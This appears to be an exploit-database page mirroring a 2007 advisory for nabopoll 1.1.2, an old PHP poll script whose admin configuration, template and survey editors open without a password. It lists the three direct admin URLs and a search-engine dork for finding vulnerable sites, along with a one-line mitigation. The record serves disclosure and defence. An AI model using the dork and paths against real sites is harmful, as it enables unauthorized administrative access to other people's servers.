header-logo
Suggest Exploit
vendor:
nabopoll
by:
sn0oPy
N/A
CVSS
HIGH
Sensitive file exposure
22
CWE
Product Name: nabopoll
Affected Version From: 1.1.2002
Affected Version To: 1.1.2002
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

nabopoll 1.1.2 sensitive file (admin without password)

Access without password to the admin config_edit.php, template_edit.php, and survey_edit.php files in nabopoll 1.1.2.

Mitigation:

Set proper access controls and password protection for sensitive files.
Source

Exploit-DB raw data:

* nabopoll 1.1.2 sensitive file (admin without password)

* By : sn0oPy

* Risk : high

* site : http://nabocorp.com/

* Dork : inurl:"nabopoll/"

* exploit :

acces without password to :

http://target/nabopoll/admin/config_edit.php
http://target/nabopoll/admin/template_edit.php
http://target/nabopoll/admin/survey_edit.php

* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]

* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).

http://forums.avenir-geopolitique.net/viewtopic.php?t=2643

# milw0rm.com [2007-02-13]

Navigation

Suggest Exploit

Services By CQR